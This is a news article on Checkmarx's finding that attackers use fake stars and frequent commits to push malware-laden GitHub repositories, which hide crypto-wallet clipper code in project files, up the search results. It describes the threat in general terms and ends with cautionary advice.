(Credit: Pavlo Gonchar/SOPA Images/LightRocket via Getty Images)
Malicious actors are gaming GitHub's search results to trick unsuspecting users into accidentally downloading Windows malware on their computers, according to a new report from cybersecurity software firm Checkmarx.
Attackers are creating GitHub repositories with names that claim to be for frequently researched topics when in reality, they're thinly disguised malware, Yahuda Gelb, a research engineer at Checkmarx, writes in a blog post.
The malicious program spreading across the Microsoft-owned platform is similar to the "Keyzetsu clipper" malware, which can attack 12 different crypto wallet addresses connected to a computer, but only does so at a prespecified time on a daily basis.
The Keyzetsu malware is able to swipe a wide range of cryptocurrencies, including Bitcoin and Ethereum, by swapping wallet addresses when a user attempts a transaction. It also sends victims' details to a specifically designed Telegram bot.
Why target crypto wallets? Cryptocurrency transactions take place via blockchain networks that are decentralized enough that it's impossible to reverse a transaction. Unlike a bank, there's no one to call to ask for a chargeback when an attacker manages to access your crypto wallet or make an unwanted transaction. Most blockchains are also permissionless, meaning anyone, anywhere in the world can create a wallet and send transactions, though it is possible in many cases to trace wallets back to potential owners with some cyber-sleuthing. While crypto ownership can bring some users an increased sense of possession over their own funds, it also comes with notable risks (and price volatility).
Like Keyzetsu clipper malware, the malware Checkmarx identified will run its tasks every day without user permission. This GitHub malware also checks for a user's geolocation, and has different instructions if the user is based in Russia, though Gelb notes that the Russia contingency didn't appear to be activated yet.
The latest malware plaguing GitHub may appear legitimate, showing up at the top of search results and having tons of fake, visible stargazers—GitHub's term for users who "star" or favorite the repository. The concealed malware repositories will also have lots of frequent modifications to make them seem active, which helps boost them in GitHub's search results.
The malware itself is hiding within .csproj or .vcxproj files, according to the report, but malicious software could be hiding within other files as well. Gelb warns that GitHub users should be wary of any public repositories, and be extra cautious of any GitHub repositories posted by fresh accounts or with stargazers with newly created accounts.
Unfortunately, this isn't the first time malware has circulated on GitHub. It's been a problem for years. Checkmarx has repeatedly found "a growing trend" of malware and cyberattacks via the platform, noting back in September 2023 and March this year that it's become a substantial problem. And while GitHub has taken some steps to increase security such as requiring all users to enable two-factor authentication, it's currently unclear to what extent the site actively monitors or scans its users' uploads for potential threats.
GitHub's site policies state that users cannot use its platform to engage in "unlawful attacks," though malware research is allowed but must be clearly labeled as such. The site typically hides violating content behind "authentication," but also sometimes removes or disables content as a "last resort."